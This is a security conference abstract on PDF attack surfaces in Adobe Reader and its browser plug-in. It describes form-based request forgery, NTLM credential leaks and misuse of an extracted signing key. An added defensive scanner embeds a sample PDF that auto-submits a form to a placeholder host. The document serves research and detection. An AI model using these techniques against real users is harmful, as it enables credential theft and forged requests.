Damien Aumaitre (Sogeti)

Presentation Title: PDF Origami Strikes Back

Presentation Abstract

Last year, we presented at PacSec some risks related to the PDF format. Many samples were provided. In the end, we showed two real-life attacks focused on the PDF language and Acrobat Reader [1].

Since the language itself has now been well studied, we now focus on its environment:

- What about Adobe Reader and the other PDF-related products? How do they interact with the OS, the browser, …?
- How can PDF files help an attacker improve his operations?

Regarding Adobe and PDF, we have mainly focused on the Reader and on Adobe's browser plug-in. The Reader is a really big piece of software (300 MB) with lots of dependencies (plug-ins, DLLs, executables), which makes it a mess to analyze. We have started to sort through that mess, trying to isolate the various features. One interesting feature is its use of cryptography, either for encryption or for granting extended permissions based on a signature (what Adobe calls "certification" and "usage rights").

Our current status on crypto is:

- The new encryption mode is a better target for an attacker when the password is shorter than 32 characters.
- Adobe's private key, which we extracted last year, still works to grant "usage rights", but PDFs signed with it now have an invalid signature: this has to be investigated.

We are also focusing on Adobe's plug-in for reading PDF files in the browser. First, the now famous JavaScript engine will be studied. It is based on an old SpiderMonkey engine, modified to support PDF features. However, the most recent documentation covers version 8 of Reader, whereas the current version is 9. Much of the information is unreliable or simply absent from the documentation, so we have extracted the undocumented functions. But JavaScript is only one action among many in PDF, so we have also looked at how some other actions behave in the plug-in (mainly Launch, URI, SubmitForm and GoToR). The main feature for an attacker is that they do not throw an alert when connecting to a remote site, since that is normal behavior in a browser (conversely to what happens when these actions are called in the standalone reader).

Currently, our main result is on credential leaks:

- When a PDF contains an invisible form that is submitted automatically, the submission is passed to the browser, which sends the form … together with the cookies associated with the target site if the user was previously authenticated there. Thus cross-site request forgery is possible with PDF files.

- On a LAN, it is possible to cause Windows to force an NTLM challenge and thus leak the NTLM credentials with no warning at all for the user. Thus PDF files are a really good way to carry out a "pass the hash" attack.
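As an added example (not from the presentation or its authors), a small Python scanner that applies the point above from the defender's side: it walks the objects of a PDF and flags the action types named in the abstract (Launch, URI, SubmitForm, GoToR, plus JavaScript), recording whether each fires automatically through /OpenAction or /AA, which is the case that matters for an auto-submitted form. The embedded PDF and the host collector.invalid are constructed; a raw byte scan like this misses actions hidden in compressed object streams, so feed it decompressed input (for example the output of qpdf --qdf).

```python
import re

# Action types the abstract singles out as reaching outside the reader
# (the browser plug-in shows no alert when they contact a remote site).
RISKY_ACTIONS = {"Launch", "URI", "SubmitForm", "GoToR", "JavaScript"}

# Constructed minimal PDF: an action submitted on document open to a placeholder host.
SAMPLE_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >> endobj
2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj
3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >> endobj
4 0 obj << /Type /Action /S /SubmitForm /F (http://collector.invalid/post) /Flags 4 >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

OBJ_RE = re.compile(rb"(\d+)\s+\d+\s+obj(.*?)endobj", re.S)
ACTION_RE = re.compile(rb"/S\s*/([A-Za-z]+)")          # /S /SubmitForm, /S /URI, ...
TARGET_RE = re.compile(rb"/F\s*\(([^)]*)\)|/URI\s*\(([^)]*)\)")
REF_RE = re.compile(rb"(\d+)\s+\d+\s+R")


def auto_triggered_refs(objects):
    """Object numbers reached from /OpenAction or an /AA dictionary: these run without a click."""
    refs = set()
    for body in objects.values():
        for m in re.finditer(rb"/OpenAction\s*(\d+)\s+\d+\s+R", body):
            refs.add(int(m.group(1)))
        for m in re.finditer(rb"/AA\s*<<(.*?)>>", body, re.S):
            refs.update(int(r.group(1)) for r in REF_RE.finditer(m.group(1)))
    return refs


def scan_pdf(data: bytes) -> list:
    """Return one finding per risky action object found in the raw (uncompressed) PDF bytes."""
    objects = {int(num): body for num, body in OBJ_RE.findall(data)}
    auto = auto_triggered_refs(objects)
    findings = []
    for num, body in objects.items():
        for m in ACTION_RE.finditer(body):
            name = m.group(1).decode()
            if name not in RISKY_ACTIONS:
                continue
            t = TARGET_RE.search(body)
            target = next((g for g in t.groups() if g), b"").decode(errors="replace") if t else ""
            findings.append({"object": num, "action": name, "target": target, "automatic": num in auto})
    return findings


if __name__ == "__main__":
    for f in scan_pdf(SAMPLE_PDF):
        print(f)  # {'object': 4, 'action': 'SubmitForm', 'target': 'http://collector.invalid/post', 'automatic': True}
```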

About Damien Aumaitre

Damien Aumaitre has been working in the software security research and development team at Sogeti for three years. He has worked on low-level PCI and FireWire, and on Windows kernel internals.

** Note: Presenting with Frédéric Raynal (Head of Research & Software Development, Sogeti/Cap Gemini) and Guillaume Delugré (Sogeti)